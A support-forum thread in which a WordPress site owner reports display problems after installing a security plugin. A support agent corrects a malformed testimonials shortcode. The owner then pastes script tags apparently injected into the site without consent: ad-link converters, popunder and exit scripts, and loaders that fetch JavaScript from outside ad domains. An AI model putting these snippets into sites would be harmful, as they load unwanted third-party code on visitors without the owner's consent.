Display issues after installed defender

hi

i am having display issues not all of my content on my website is displaying correctly.

if you visit http://www.illit.co.uk/reviews you will see out reviews do not display as
also on the home page you will see [dt_testimonials type=”slider” autoslide=”5000? number=”5? orderby=”rand” category=”reviews”]

i am also finding that on the shop menu bar there is //

  • Dimitris

    Hello there Lee Walker,

    hope you're doing good today and thanks for reaching us! :slight_smile:

    It seems that these errors aren't coming from Defender, I still have some feedback for you.

    if you visit http://www.illit.co.uk/reviews you will see out reviews do not display

    Could you please elaborate a bit more on this?
    Where exactly should these be displayed and how did you inserted them?

    on the home page you will see [dt_testimonials type=”slider” autoslide=”5000? number=”5? orderby=”rand” category=”reviews”]

    It seems that the double quotes you use aren't the proper ones, as it seems like they are italic and there are also some question marks. Please try to replace this shortcode with:
    [dt_testimonials type="slider" autoslide="5000" number="5" orderby="rand" category="reviews"]

    i am also finding that on the shop menu bar there is //

    It seems that the theme you're using, it has the option to insert a subtitle in the menu items.

    This should be a setting in the native WP menus screen and specifically in each menu item settings (more info about menus can be found here) or in the theme options screen of your theme.

    If more assistance is required here, please consider granting us with temporary support access to your website via WPMUDEV Dashboard plugin, as shown here
    https://premium.wpmudev.org/docs/getting-started/getting-support/#chapter-5
    and let us know that access have been granted in your next reply, as we don't get any notifications about it.

    Warm regards,
    Dimitris

  • Lee Walker

    hi i have granted access but i believe the issue is something accessing my site and adding code like this

    <script type="text/javascript">
    var adlinkfly_url = 'https://cutwin.com/';
    var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641';
    var adlinkfly_advert = 2;
    var adlinkfly_exclude_domains = ['example.com', 'yoursite.com'];
    </script>

    <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1086384"></script>//<![CDATA[ (function() { var configuration = { "token": "11f0dc1ed8453e409e04d86bea962f34", "exitScript": { "enabled": true }, "popUnder": { "enabled": true } }; var script = document.createElement('script'); script.async = true; script.src = '//cdn.shorte.st/link-converter.min.js'; script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);}; var entry = document.getElementsByTagName('script')[0]; entry.parentNode.insertBefore(script, entry); })(); //]]><script data-cfasync='false' type='text/javascript' src='//p80227.clksite.com/adServe/banners?tid=80227_250494_0&tagid=2'></script>

     

    without being detected or stopped by defender. there is is that has access to the site.

    i have changed passwords for all account but it still happening